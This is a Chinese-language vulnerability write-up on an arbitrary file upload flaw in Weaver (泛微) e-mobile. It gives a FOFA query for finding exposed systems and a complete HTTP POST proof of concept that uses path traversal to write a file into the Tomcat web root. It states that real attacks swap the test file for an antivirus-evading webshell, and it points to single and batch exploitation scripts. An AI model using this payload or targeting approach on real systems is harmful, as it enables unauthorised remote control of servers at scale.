一、漏洞描述
泛微e-mobile,由高端OA泛微专业研发,是业内领先的移动OA系统,提供移动审批,移动考勤,移动报表,企业微信等丰富办公应用,支持多种平台运行,灵活易用安全性高。
e-mobile可满足企业日常管理中的绝大部分管理需求, 诸如市场销售、项目、采购、研发、客服、财务、人事、行政等;同时e-mobile可帮助企业实现面向不同用户量身定制的移动办公入口,包括企业员工、供应商、代理商、 合作伙伴、投资费以及终端客户等整个供应链条上的关系主体,满足为企业全方位的移动办公需求。该系统存任意文件上传漏洞,攻击者可通过此漏洞上传webshell木马远程控制服务器。
二、网络空间搜索引擎查询
fofa查询
title="移动管理平台-企业管理"
三、漏洞复现
POC
POST /emp/lang2sql?client_type=1&lang_tag=1 HTTP/1.1
Host: ip:port
Content-Type: multipart/form-data;boundary=----WebKitFormBoundarymVk33liI64J7GQaK
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 226
Expect: 100-continue
Connection: close
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="file";filename="../../../../appsvr/tomcat/webapps/ROOT/Check.txt"
This site has a vulnerability !!!
------WebKitFormBoundarymVk33liI64J7GQaK--
上传成功后访问
实战中将上传内容换成免杀的webshell木马即可
三、漏洞检测
单个检测
python lang2sqlUpload.py -u url
批量检测
python lang2sqlUpload.py -f filename
关注微信公众号 网络安全透视镜 回复 20231107 获取批量检测脚本
版权归原作者 为赋新词强说愁 所有, 如有侵权,请联系我们删除。